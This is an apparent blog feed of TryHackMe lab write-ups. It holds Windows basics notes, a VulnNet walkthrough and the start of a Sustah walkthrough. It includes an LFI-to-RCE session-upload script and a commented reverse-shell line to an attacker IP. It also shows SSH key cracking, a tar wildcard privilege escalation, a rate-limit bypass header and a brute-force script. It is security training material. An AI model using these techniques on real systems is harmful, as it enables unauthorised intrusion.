&lt;li&gt;範例建立一個 ADS 的東東&lt;img loading="lazy" src="https://i.imgur.com/5kOtSRd.png"&gt;用 Dir 看不出來- &lt;img loading="lazy" src="https://i.imgur.com/jCrO2X8.png"&gt;用 Type 也看不出來- &lt;img loading="lazy" src="https://i.imgur.com/ekfM1mN.png"&gt;可以用 powershell &lt;code&gt;GET-Item -path C:\Users\Administrator\Desktop\example -stream *&lt;/code&gt;- &lt;img loading="lazy" src="https://i.imgur.com/zgKdKdH.png"&gt;CMD 需要裝 Sysinternals 的 Streams- &lt;a href="https://docs.microsoft.com/zh-tw/sysinternals/downloads/streamsWhat"&gt;https://docs.microsoft.com/zh-tw/sysinternals/downloads/streamsWhat&lt;/a&gt; is the meaning of NTFS?- New Technology File System&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-5-the-windowssystem32-folders"&gt;Task 5 The Windows\System32 Folders&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;%windir%&lt;/code&gt;最常見的位子在 &lt;code&gt;C:\Windows&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;裡面存放著作業系統，但他不一定需要在 C，也有一些喪心病狂的人會把他設定在其他地方&lt;/li&gt;
&lt;li&gt;所以我們可以使用環境變數，或是說系統環境變數(System environment variables) 來正確的訪問&lt;code&gt;System32&lt;/code&gt;- 資料夾中有許多對作業系統來說很重要的檔案&lt;/li&gt;
&lt;li&gt;在變動、刪除時要特別小心，很可能讓系統爛掉What is the system variable for the Windows folder?- &lt;code&gt;%windir%&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-6-user-accounts-profiles-and-permissions"&gt;Task 6 User Accounts, Profiles, and Permissions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;兩種類型的帳戶Administrator增、刪使用者&lt;/li&gt;
&lt;li&gt;修改 Group&lt;/li&gt;
&lt;li&gt;修改作業系統設定Standard User- 修改與該使用者相關的資料夾、檔案的屬性&lt;/li&gt;
&lt;li&gt;不能做系統層級的修改，例如安裝軟體使用者家目錄- &lt;code&gt;C:\Users\{Username}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;預設會有Desktop&lt;/li&gt;
&lt;li&gt;Documents&lt;/li&gt;
&lt;li&gt;Downloads&lt;/li&gt;
&lt;li&gt;Music&lt;/li&gt;
&lt;li&gt;PicturesLocal User and Group Management- &lt;code&gt;lusrmgr.msc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="https://i.imgur.com/fyKUJjj.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看到各種使用者、群組的資訊What is the name of the other user account?- tryhackmebillyWhat groups is this user a member of?- &lt;img loading="lazy" src="https://i.imgur.com/UG7fYkT.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Remote Desktop Users,Users&lt;/code&gt;What built-in account is for guest access to the computer?- GuestWhat is the account status?- &lt;img loading="lazy" src="https://i.imgur.com/HaK4mu6.png"&gt;&lt;/li&gt;
&lt;li&gt;Account is disabled&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-7-user-account-control"&gt;Task 7 User Account Control&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;UACUser Account ControlVista 後開始使用的可以觀察到一個安裝檔案可能並沒有使用者相關的權限- &lt;img loading="lazy" src="https://i.imgur.com/Upd8XM6.png"&gt;登入一個普通使用者- &lt;code&gt;tryhackmebilly&lt;/code&gt; / &lt;code&gt;window$Fun1!&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;10.10.229.121&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="https://i.imgur.com/LW8bHbS.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現多出盾牌 icon如果執行安裝- 會需要輸入 Administrator 的密碼&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="https://i.imgur.com/w5JAACI.png"&gt;What does UAC mean?- User Account Control&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-8-settings-and-the-control-panel"&gt;Task 8 Settings and the Control Panel&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Win8 後出現 Settings 頁面&lt;img loading="lazy" src="https://i.imgur.com/AnP3CPq.png"&gt;舊版控制台 (Control Panel)- &lt;img loading="lazy" src="https://i.imgur.com/xyxW5OJ.png"&gt;In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?- &lt;img loading="lazy" src="https://i.imgur.com/VyOGwm5.png"&gt;&lt;/li&gt;
&lt;li&gt;右上角選 small icons&lt;/li&gt;
&lt;li&gt;最後一個選項是 Windows Defender Firewall&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-9-task-manager"&gt;Task 9 Task Manager&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;What is the keyboard shortcut to open Task Manager?&lt;code&gt;ctrl+shift+esc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;哇酷，我還真不知道有這種東西呢&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-10-conclusion"&gt;Task 10 Conclusion&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;喵喵&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>VulnNet (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/23/vulnnet-try-hack-me-writeup/</link><pubDate>Mon, 23 Aug 2021 13:28:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/23/vulnnet-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/vulnnet1"&gt;https://tryhackme.com/room/vulnnet1&lt;/a&gt;&lt;br&gt;
IP : 10.10.86.144&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;題目敘述&lt;code&gt;You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.86.144 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2a603-vIQriUD.png"&gt;&lt;code&gt;nmap -A -p22,80 10.10.86.144&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/562ca-8iyHObG.png"&gt;掃目錄- &lt;code&gt;python3 dirsearch.py -u http://10.10.86.144/&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9308d-qURY7kW.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5c374-vphYlEc.png"&gt;發現登入頁面- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/98e78-lOR56fr.png"&gt;&lt;/li&gt;
&lt;li&gt;戳了常見的 SQLi 都不行觀察網頁連結- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/877c6-UtPIr0V.png"&gt;透過 js formatter 轉漂亮&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/88009-rjfcVqd.png"&gt;- &lt;code&gt;broadcast.vulnnet.thm&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;加到 &lt;code&gt;/etc/hosts&lt;/code&gt;前面的階段也可以用 &lt;code&gt;LinkFinder&lt;/code&gt;- &lt;code&gt;python3 linkfinder.py -i http://vulnnet.thm/&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1ee05-oWZvBQs.png"&gt;&lt;code&gt;python3 linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/74eca-JlJlqLz.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7116c-nJFz81A.png"&gt;發現首頁可以帶一個 &lt;code&gt;?referer&lt;/code&gt; 參數訪問 &lt;code&gt;broadcast.vulnnet.thm&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4b286-VHfgLFt.png"&gt;&lt;/li&gt;
&lt;li&gt;發現需要登入觀察首頁 &lt;code&gt;referer&lt;/code&gt; 參數- 發現可以 LFI&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cabf3-WKOWvWA.png"&gt;用 Session upload progress 大法&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-gdscript3" data-lang="gdscript3"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;import grequests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sess_name &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;meowmeow&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sess_path &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; f&lt;span style="color:#f1fa8c"&gt;&amp;#39;/var/lib/php/sessions/sess_{sess_name}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_url &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://vulnnet.thm/index.php&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;param &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;referer&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;#code = &amp;#34;file_put_contents(&amp;#39;/tmp/shell.php&amp;#39;,&amp;#39;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1&amp;#39;&amp;#34;);&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;while&lt;/span&gt; True:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; [grequests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;post(base_url,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;{&lt;span style="color:#f1fa8c"&gt;&amp;#39;f&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;*&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;0xffff&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;{&lt;span style="color:#f1fa8c"&gt;&amp;#39;PHP_SESSION_UPLOAD_PROGRESS&amp;#39;&lt;/span&gt;: f&lt;span style="color:#f1fa8c"&gt;&amp;#34;pwned:&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cookies&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;{&lt;span style="color:#f1fa8c"&gt;&amp;#39;PHPSESSID&amp;#39;&lt;/span&gt;: sess_name}),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; grequests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;get(f&lt;span style="color:#f1fa8c"&gt;&amp;#34;{base_url}?{param}={sess_path}&amp;#34;&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; grequests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;map(req)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;pwned&amp;#34;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; result[&lt;span style="color:#bd93f9"&gt;1&lt;/span&gt;]&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(result[&lt;span style="color:#bd93f9"&gt;1&lt;/span&gt;]&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;break&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;然後就 RCE 了&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a1fdf-Nw726OE.png"&gt;&lt;/li&gt;
&lt;li&gt;(感覺就不是正規解…ㄏㄏ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;python3 -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;掃豌豆&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/65cb3-XZOpfXC.png"&gt;&lt;/li&gt;
&lt;li&gt;找到 backup&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6240f-KBMz0OO.png"&gt;觀察 backup 檔案，發現有 ssh-backup- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e5582-so7QneR.png"&gt;&lt;/li&gt;
&lt;li&gt;偷出來解壓縮- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/610d9-jsXBiUr.png"&gt;&lt;/li&gt;
&lt;li&gt;發現是 &lt;code&gt;id_rsa&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/51aef-0P706uh.png"&gt;到家目錄看使用者名稱- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a890d-v2l4V0H.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;server-management&lt;/code&gt;發現是 &lt;code&gt;server-management&lt;/code&gt;準備 ssh 登入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d02d9-qRY1yQi.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 &lt;code&gt;id_rsa&lt;/code&gt; 需要密碼 QQ用約翰爆破- &lt;code&gt;python3 ../../ssh2john.py id_rsa &amp;gt; id_rsa_john&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6b9be-Wd6L7hB.png"&gt;&lt;/li&gt;
&lt;li&gt;密碼是 &lt;code&gt;oneTWO3gOyac&lt;/code&gt;SSH 登入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ceed6-78Hekqp.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 user flag跑豌豆掃到 &lt;code&gt;.htpasswd&lt;/code&gt; 密碼的 hash- 猜測應該是給 &lt;code&gt;broadcast.vulnnet.thm&lt;/code&gt; 用的&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/47aa5-cGflEXG.png"&gt;&lt;/li&gt;
&lt;li&gt;用約翰爆破個&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4ae0f-g5fTfFi.png"&gt;&lt;/li&gt;
&lt;li&gt;密碼是 ``9972761drmfsls&lt;code&gt;猜測原始思路正規解法應該是 LFI 到這個檔案訪問 broadcast.vulnnet.thm- 使用帳號 &lt;/code&gt;developers&lt;code&gt;![](/uploads/2022/02/7cb34-jR4k1zC.png)密碼 &lt;/code&gt;9972761drmfsls`&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c5964-Hp0c1Il.png"&gt;- 推測這應該是某個有 RCE 洞的 CMS&lt;/li&gt;
&lt;li&gt;正規解是從這邊進 RCE ㄅ&lt;/li&gt;
&lt;li&gt;隨便&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;想起前面的 Backup 用了 &lt;code&gt;tar *&lt;/code&gt;所以可以快速提權&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/592b6-gE5YL0d.png"&gt;接 Shell- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/49aa9-hXx86b5.png"&gt;取 Root Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/becd4-XSutGiW.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Sustah (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/23/sustah-try-hack-me-writeup/</link><pubDate>Mon, 23 Aug 2021 13:26:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/23/sustah-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/sustah"&gt;https://tryhackme.com/room/sustah&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.252.122&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.252.122 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/69385-Hn5pZPX.png"&gt;&lt;code&gt;nmap -A -p22,80,8085 10.10.252.122&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7e6c0-XFGhbeq.png"&gt;&lt;/li&gt;
&lt;li&gt;gunicorn 20.0.4觀察首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/27dae-Yf78MKv.jpg"&gt;&lt;/li&gt;
&lt;li&gt;啥都ㄇ有&lt;/li&gt;
&lt;li&gt;掃目錄&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6896c-aljCOjz.png"&gt;&lt;/li&gt;
&lt;li&gt;也沒東西觀察 8085 port- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2d4b3-7KwmzSk.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來像是幸運轉盤&lt;/li&gt;
&lt;li&gt;掃目錄&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f2275-MnxxFI6.png"&gt;&lt;/li&gt;
&lt;li&gt;有一個 ping 他只會回 pong&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="爆數字"&gt;爆數字&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;下面有一個猜數字遊戲&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bc8c3-2R9ESg5.png"&gt;&lt;/li&gt;
&lt;li&gt;他說我有 0.004% 的勝率&lt;/li&gt;
&lt;li&gt;先測一下能不能爆破&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;from&lt;/span&gt; bs4 &lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; BeautifulSoup
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;User-Agent&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept-Language&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;en-US,en;q=0.5&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Origin&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Connection&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;keep-alive&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Referer&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085/home&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Upgrade-Insecure-Requests&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;number&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;123&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;range&lt;/span&gt;(&lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;post(&lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.252.122:8085/home&amp;#39;&lt;/span&gt;, headers&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;headers, data&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; soup &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; BeautifulSoup(response&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text,&lt;span style="color:#f1fa8c"&gt;&amp;#39;html.parser&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(soup&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;find(&lt;span style="color:#f1fa8c"&gt;&amp;#39;h3&amp;#39;&lt;/span&gt;)&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(soup)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;發現次數過多他會噴&lt;code&gt;{&amp;quot;error&amp;quot;:&amp;quot;rate limit execeeded&amp;quot;}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e725d-Ka1SXAx.png"&gt;試了很多次發現- 帶 &amp;lsquo;X-Remote-Addr&amp;rsquo; : &amp;lsquo;127.0.0.1&amp;rsquo;&lt;/li&gt;
&lt;li&gt;就不會噴錯了計算一下- &lt;code&gt;1/(0.004%) = 25000&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以猜測密碼在這之間&lt;/li&gt;
&lt;li&gt;寫腳本來爆一下&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;from&lt;/span&gt; bs4 &lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; BeautifulSoup
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;from&lt;/span&gt; multiprocessing &lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; Process, Pool
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;User-Agent&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept-Language&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;en-US,en;q=0.5&amp;#39;&lt;/span&gt;,
